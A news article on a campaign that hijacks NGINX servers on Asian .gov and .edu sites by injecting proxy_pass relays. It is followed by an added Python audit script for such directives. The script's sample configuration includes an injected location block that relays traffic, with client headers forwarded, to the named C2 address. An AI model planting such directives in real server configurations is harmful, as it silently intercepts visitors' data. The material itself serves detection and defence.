Cyberattack Campaign Targets NGINX Servers, Aiming at Government and Educational Websites Across Asia


Friday, February 6, 2026

Researchers at Datadog Security Labs have identified a campaign that compromises servers running NGINX, the widely used web server and reverse proxy. Rather than dropping obvious malware, the threat actors edit the NGINX configuration so that requests to a site are silently proxied through attacker-controlled infrastructure before being forwarded to the legitimate backend; visitors' data passes through the attackers' hosts on the way. The campaign concentrates on websites under Asian country-code top-level domains (TLDs), with a focus on government (.gov) and educational (.edu) domains, including Thai (.th) sites, and in particular on servers managed with the Baota control panel.

The attackers' toolkit is built for stealth. It runs a sequence of steps that inserts malicious directives into NGINX location blocks, abusing the proxy_pass directive, which legitimately hands a request to an upstream server for reverse proxying and load balancing, to send traffic to the attackers' relay instead. Because an extra proxy_pass looks exactly like an ordinary reverse-proxy setup, most detection tools have nothing to flag. The injected blocks also forward the original client headers, such as the visitor's IP address and browser type (headers such as X-Forwarded-For and User-Agent), so the relayed requests reach the legitimate site looking unmodified and raise no suspicion while the data transits the criminal infrastructure.

What makes this campaign especially concerning is how hard it is to detect. Rather than exploiting a vulnerability in the software, the attackers plant directives in configuration files that administrators rarely re-read once a site is working. Visitors still reach the intended website and see nothing wrong, so they have no reason to suspect that their personal data is being intercepted in transit. Administrators are advised to review every active NGINX configuration immediately, starting with /etc/nginx/sites-enabled (and, on Baota-managed servers, the panel's own vhost directory under /www/server/panel/vhost/nginx), to look for unfamiliar script files such as zx[.]sh and bt[.]sh, and to check for unexpected outbound connections to 158.94.210[.]227, which has been identified as the attackers' command-and-control (C2) server. Any proxy_pass whose upstream is not a host you deployed should be treated as a compromise until proven otherwise; running nginx -T dumps the configuration NGINX is actually loading, including files pulled in via include, and is the quickest way to see every location block at once.
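As an added example (not code from the Datadog report or from the article), the following Python script illustrates the configuration review described above. It walks NGINX configuration text block by block, reports every proxy_pass whose upstream is the C2 address named in the article, a public IP literal, or a host missing from an administrator-supplied allowlist, and notes which client-identifying headers the same location block forwards, the behaviour the article highlights. The sample configuration, the allowlist and the hostnames in it are constructed for illustration; only the 158.94.210.227 indicator comes from the article.

```python
"""Audit NGINX configuration text for proxy_pass directives that relay traffic
to unexpected upstreams. Added example, not the researchers' own tooling."""
import ipaddress
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Indicator from the article (written there as 158.94.210[.]227).
IOC_HOSTS = {"158.94.210.227"}
# Hypothetical allowlist: upstreams this deployment is known to use.
ALLOWED_UPSTREAMS = {"127.0.0.1", "localhost", "app_backend"}
# Client-identifying headers whose forwarding the article calls out.
CLIENT_HEADERS = {"host", "x-forwarded-for", "x-real-ip", "user-agent"}

# Constructed sample: one legitimate local backend plus two injected relays.
SAMPLE_CONF = """\
server {
    listen 80;
    server_name www.example.go.th;  # constructed stand-in, not a real site
    location /api/ {
        proxy_pass http://127.0.0.1:8080;  # expected local backend
    }
    location / {
        # injected: relay through the attacker's host, keeping client headers intact
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $remote_addr;
        proxy_set_header User-Agent $http_user_agent;
        proxy_pass http://158.94.210.227$request_uri;
    }
    location /static/ {
        proxy_pass http://relay.example.net/;  # constructed: not in the allowlist
    }
}
"""


@dataclass
class Finding:
    line: int
    context: str          # enclosing blocks, e.g. "server > location /"
    upstream: str
    reason: str
    forwarded_headers: list = field(default_factory=list)


def _strip_comments(text: str) -> str:
    # '#' to end of line is a comment; newlines are kept so line numbers survive.
    return re.sub(r"#[^\n]*", "", text)


def _upstream_host(target: str) -> str:
    if "unix:" in target:
        return "unix-socket"
    target = re.sub(r"\$\w+", "", target)  # drop nginx variables such as $request_uri
    if "://" not in target:
        target = "http://" + target
    return urlparse(target).hostname or "<dynamic>"


def _classify(host: str, allowed, iocs):
    if host in iocs:
        return "matches known C2 indicator"
    try:
        if ipaddress.ip_address(host).is_global:
            return "proxies to a public IP literal"
    except ValueError:
        pass  # a hostname or upstream-group name, not an IP
    if host != "unix-socket" and host not in allowed:
        return "upstream not in allowlist"
    return None


def _analyze_block(parents, header, stmts, allowed, iocs):
    context = " > ".join(parents + [header])
    forwarded = sorted(tok[1].lower() for _, tok in stmts
                       if tok[0] == "proxy_set_header" and len(tok) > 1
                       and tok[1].lower() in CLIENT_HEADERS)
    out = []
    for line, tok in stmts:
        if tok[0] == "proxy_pass" and len(tok) > 1:
            host = _upstream_host(tok[1])
            reason = _classify(host, allowed, iocs)
            if reason:
                out.append(Finding(line, context, host, reason, forwarded))
    return out


def scan_nginx_conf(text, allowed=ALLOWED_UPSTREAMS, iocs=IOC_HOSTS):
    """Return Findings for every suspicious proxy_pass in one config text."""
    clean = _strip_comments(text)
    stack = [("<top>", [])]          # (block header, [(line, tokens), ...])
    findings = []
    for m in re.finditer(r"([^;{}]*)([;{}])", clean):
        body, delim = m.group(1).strip(), m.group(2)
        first = m.start(1) + len(m.group(1)) - len(m.group(1).lstrip())
        line = clean.count("\n", 0, first) + 1
        if delim == "{":
            stack.append((body, []))
        elif delim == "}":
            header, stmts = stack.pop()
            parents = [h for h, _ in stack[1:]]
            findings.extend(_analyze_block(parents, header, stmts, allowed, iocs))
        elif body:
            stack[-1][1].append((line, body.split()))
    header, stmts = stack.pop()      # directives outside any block
    findings.extend(_analyze_block([], header, stmts, allowed, iocs))
    return sorted(findings, key=lambda f: f.line)


if __name__ == "__main__":
    import sys
    # Pass real files (e.g. the output of `nginx -T` saved to disk) as arguments.
    sources = [(p, open(p).read()) for p in sys.argv[1:]] or [("<sample>", SAMPLE_CONF)]
    for name, text in sources:
        for f in scan_nginx_conf(text):
            hdrs = ", ".join(f.forwarded_headers) or "none"
            print(f"{name}:{f.line} [{f.context}] proxy_pass -> {f.upstream}: "
                  f"{f.reason}; client headers forwarded: {hdrs}")
```

Run it against `nginx -T` output rather than individual files so that configuration reached through include directives, such as Baota's vhost files, is covered in one pass. The allowlist is the part to tailor: seed it from your inventory of backends, and treat every other upstream as a question that needs an answer.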

Source https://www.bleepingcomputer.com/news/security/hackers-compromise-nginx-servers-to-redirect-user-traffic/